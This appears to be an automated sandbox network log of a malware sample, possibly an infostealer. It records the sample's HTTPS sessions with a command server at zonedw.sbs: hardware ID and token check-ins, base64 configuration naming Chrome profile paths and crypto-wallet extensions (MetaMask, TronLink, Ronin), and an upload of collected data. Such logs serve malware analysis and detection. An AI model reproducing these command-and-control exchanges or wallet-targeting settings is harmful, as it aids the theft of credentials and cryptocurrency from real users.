Cache-Control: no-cache Date: Sat, 14 Dec 2024 11:57:06 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=7bcd45d3a8143c1435b4afe5; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 11:57:06 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 11:57:06 UTC	10097	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 11:57:07 UTC	10555	IN	Data Raw: 3b 57 45 42 5f 55 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 Data Ascii: ;WEB_UNIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":&qu

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49964	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:08 UTC	230	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49974	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:10 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----89R1NGVKNGVAAAAAAAAI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:10 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 38 39 52 31 4e 47 56 4b 4e 47 56 41 41 41 41 41 41 41 41 49 2d 2d 0d Data Ascii: ------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236-a33c7340-61ca------89R1NGVKNGVAAAAAAAAIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------89R1NGVKNGVAAAAAAAAI--
2024-12-14 11:57:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:11 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|008fe95b61e1ba6a6bad027b4fdeaf83\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49981	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:12 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----OHVS0ZUAAI58YM7YMOPP User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:12 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 5a 55 41 41 49 35 38 59 4d 37 59 4d 4f 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 5a 55 41 41 49 35 38 59 4d 37 59 4d 4f 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 48 56 53 30 5a 55 41 41 49 35 38 59 4d 37 59 4d 4f 50 50 0d 0a 43 6f 6e 74 Data Ascii: ------OHVS0ZUAAI58YM7YMOPPContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------OHVS0ZUAAI58YM7YMOPPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------OHVS0ZUAAI58YM7YMOPPCont
2024-12-14 11:57:13 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:13 UTC	2192	IN	Data Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49989	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:15 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PHLFC2NGVAAIEUSR9RI5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:15 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 48 4c 46 43 32 4e 47 56 41 41 49 45 55 53 52 39 52 49 35 0d 0a 43 6f 6e 74 Data Ascii: ------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------PHLFC2NGVAAIEUSR9RI5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PHLFC2NGVAAIEUSR9RI5Cont
2024-12-14 11:57:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:16 UTC	5837	IN	Data Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49996	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:17 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----R9ZMGLF3EKFUAAS2DJMG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:17 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 4c 46 33 45 4b 46 55 41 41 53 32 44 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 4c 46 33 45 4b 46 55 41 41 53 32 44 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 4c 46 33 45 4b 46 55 41 41 53 32 44 4a 4d 47 0d 0a 43 6f 6e 74 Data Ascii: ------R9ZMGLF3EKFUAAS2DJMGContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------R9ZMGLF3EKFUAAS2DJMGContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------R9ZMGLF3EKFUAAS2DJMGCont
2024-12-14 11:57:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:18 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	50004	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:19 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KXB1D2VS26FU379R1DT0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 6853 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:19 UTC	6853	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 32 56 53 32 36 46 55 33 37 39 52 31 44 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 32 56 53 32 36 46 55 33 37 39 52 31 44 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 31 44 32 56 53 32 36 46 55 33 37 39 52 31 44 54 30 0d 0a 43 6f 6e 74 Data Ascii: ------KXB1D2VS26FU379R1DT0Content-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------KXB1D2VS26FU379R1DT0Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------KXB1D2VS26FU379R1DT0Cont
2024-12-14 11:57:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	50005	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:20 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----9HVSRQ90HDJM7QIW4OHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 11:57:20 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 39 48 56 53 52 51 39 30 48 44 4a 4d 37 51 49 57 34 4f 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 38 66 65 39 35 62 36 31 65 31 62 61 36 61 36 62 61 64 30 32 37 62 34 66 64 65 61 66 38 33 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 53 52 51 39 30 48 44 4a 4d 37 51 49 57 34 4f 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 48 56 53 52 51 39 30 48 44 4a 4d 37 51 49 57 34 4f 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------9HVSRQ90HDJM7QIW4OHDContent-Disposition: form-data; name="token"008fe95b61e1ba6a6bad027b4fdeaf83------9HVSRQ90HDJM7QIW4OHDContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9HVSRQ90HDJM7QIW4OHDCont
2024-12-14 11:57:21 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 11:57:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 11:57:21 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	50015	142.250.181.132	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 11:57:23 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 11:57:24 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:24 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FYkwstXPwdbXDcUkyFK_OQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 11:57:24 UTC	124	IN	Data Raw: 61 34 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 74 69 6c 64 61 20 64 6a 65 72 66 22 2c 22 6d 6f 6e 74 61 6e 61 20 73 74 61 74 65 20 62 6f 62 63 61 74 73 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 62 72 6f 61 64 63 6f 6d 20 73 74 6f 63 6b 73 22 2c 22 65 6c 64 65 6e 20 72 69 6e 67 20 72 69 6e 67 20 6e 69 67 68 74 72 65 69 67 6e 22 2c 22 69 63 65 20 73 74 6f 72 6d 20 77 61 Data Ascii: a4f)]}'["",["matilda djerf","montana state bobcats football","broadcom stocks","elden ring ring nightreign","ice storm wa
2024-12-14 11:57:24 UTC	1390	IN	Data Raw: 72 6e 69 6e 67 20 69 6f 77 61 22 2c 22 62 65 6e 20 6d 69 6c 6c 69 6b 65 6e 20 66 69 73 68 69 6e 67 22 2c 22 73 68 69 62 61 20 69 6e 75 20 70 72 69 63 65 22 2c 22 67 65 6e 6d 6f 6a 69 20 69 6f 73 20 31 38 2e 32 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 Data Ascii: rning iowa","ben milliken fishing","shiba inu price","genmoji ios 18.2"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinf
